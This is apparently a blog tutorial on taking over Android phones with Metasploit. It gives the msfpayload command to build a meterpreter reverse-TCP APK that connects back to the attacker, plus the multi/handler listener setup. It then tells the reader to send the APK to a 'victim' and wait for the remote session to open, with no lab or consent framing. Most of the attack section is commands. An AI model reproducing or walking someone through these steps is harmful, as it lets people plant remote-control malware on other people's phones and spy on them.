Hack Android Mobile With Metasploit step by step
Hello Guys, Today in this post we will discuss how to hack android mobile there are may ways of the android hacking but today I will show you how you can hack android mobile using Metasploit because metasploit is a free ware framework so we can hack mobile by this method. First let me start with introduction.
Android is a mobile operating system based on the linux kernel developed by google. primarily android is designed for touch screen mobiles such as smartphone, tablet e.t.c with user interface based on the direct mainupulation.
So let’s come to point.
- Android Phone
- Attacker system Kali linux
- Brain 🙂
so this are the requirements to perform this practical in this post In metasploit series i am covering from basics and will cover up to post exploitation.
- As an attacker we need to check our ip address using “ifconfig” command to set LHOST & LPORT.
- Now you Need to create a msfpayload use the following command.
msfpayload android/meterpreter/reverse_tcp LHOST=[Attacker IP address] LPORT [Port which you want to forward] R > /var/www/anyname.apk
Here as I setted an LPORT is 443 because there is a one good reason behind this the reason is that almost every mobile has 443 open.
by using above command the apk will created..
- Now launch msfconsole
- here we use exploit multihandler to start our attack as well as payload.
- use the following commands given below.
use exploit/multi/handler [Enter]
set payload/android/meterpreter/reverse_tcp [Enter]
Set LHOST= attacker Ip
Now we need to give permission to our apk that we created attack.apk for giving permission use this command
chmod 777 /var/www/attack.apk
Yeah, we gave permission to our apk Now, I will send file to victim. Before installing this file to victim just start your metasploit listener using exploit command. when victim installed your apk then metaploit behaviour changes like this and shows you session opened..
Now our listner is listening traffic and giving information.
In previous tutorial we discussed post exploitation with meterpreter in netapi windows xp vulnerability read carefully steps are same.
Keep learning and practising…